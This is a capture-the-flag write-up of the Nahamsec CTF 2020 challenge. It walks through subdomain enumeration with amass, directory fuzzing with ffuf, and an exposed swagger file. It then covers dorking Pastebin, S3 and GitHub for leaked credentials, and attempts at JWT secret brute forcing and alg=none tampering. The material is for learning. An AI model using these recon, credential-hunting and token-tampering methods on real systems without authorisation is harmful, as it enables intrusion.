Nahamsec CTF

The first step was to check the where the picture was hosted with a simple right click -> view image:

img

This led to a new domain: nahamsec.net/Nahamsec_CTF_Giveaway.jpg

If a new domain is found, I like to begin subdomain discovery, with my go-to tool being amass:

amass -d nahamsec.net -brute -active -o nahamsec-subs.txt

http://30kftw.nahamsec.net
https://30kftw.nahamsec.net
http://api-admin.nahamsec.net
https://api-admin.nahamsec.net
http://api-dev.nahamsec.net
https://api-dev.nahamsec.net

API instantly drew my eye so I kicked off some file/directory brute forcing and started checking out the subdomains:

ffuf -u http://api-admin.nahamsec.net/FUZZ -w juicy.txt -ac -recursion -v
ffuf -u http://api-dev.nahamsec.net/FUZZ -w juicy.txt -ac -recursion -v

I also noticed 30kftw.nahamsec.net had the message: Welcome to Admin Site, Admin area only allowed from our intranet!

Which made me note down a possible target for SSRF.

FFuF then came back with a hit:

[Status: 200, Size: 823, Words: 85, Lines: 2]
api-admin.nahamsec.net/swagger.json  

Discovering a swagger specification is an absolute gold mine to understanding the API and finding possible issues. Which revealed 2 paths: post /api/getflag & get /api/token

However, they returned a 500 INTERNAL SERVER ERROR. This led me to trying several things, adding /v0.1/ /v1/ /v2/ to the paths, trying the endpoints on the api-dev subdomain too, theorising the endpoints might exist in the development area too, however this didn’t return anything either. In my playing around I noticed a GET to /api/tokens would ask for credentials.

And swagger also gave 2 other clues: “Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!" and “tags: “nahamsecCTF2020”"

This led me to think where credentials might be posted or left up by mistake… in Pastebin, Github, an unsecured storage like an S3 bucket etc.

I checked Pastebin with some Google dorks: site:pastebin.com "nahamsecCTF2020" etc.

I checked S3 storage:

aws s3 ls s3://nahamsecCTF2020
An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist

and other variations, which also made me think of claiming these bucket names to throw some people off but thought that might be too mean :p

And finally some Github dorking: user:nahamsec api & user:nahamsec credentials etc.

However this returned nothing either. However remembering a recent report on Hackerone’s Hacktivity you can sometimes find Github secrets from developers actively working on a project for the organisation, not necessarily in the organisations own Github.

This led me to search for nahamsecCTF2020 in the whole of Github, which brought me to this repository: https://github.com/garagosy/nahamsecCTF2020 which in the api.pycontained some credentials.

I then went back to use the credentials on the GET /api/tokens endpoint found earlier which returned a JWT which led me to try several things: Trying to POST /api/getflag with a several different Token: headers. Tampering with the JWT, as it was currently set id = 2, by attempting to bruteforce the secret as it was signed with HS256 - a potentially guessable secret.

img

However this didn’t lead to anything. I thought it could be a dead end, however I went back to the endpoints to try find where it might lead me to a clue to abuse the JWT with a alg = none header value and no signature as I couldn’t sign it genuinely. In that process I ended up sending a GET /api/getflag which asked me for credentials! I inputted the ones from earlier, which revealed the flag! :)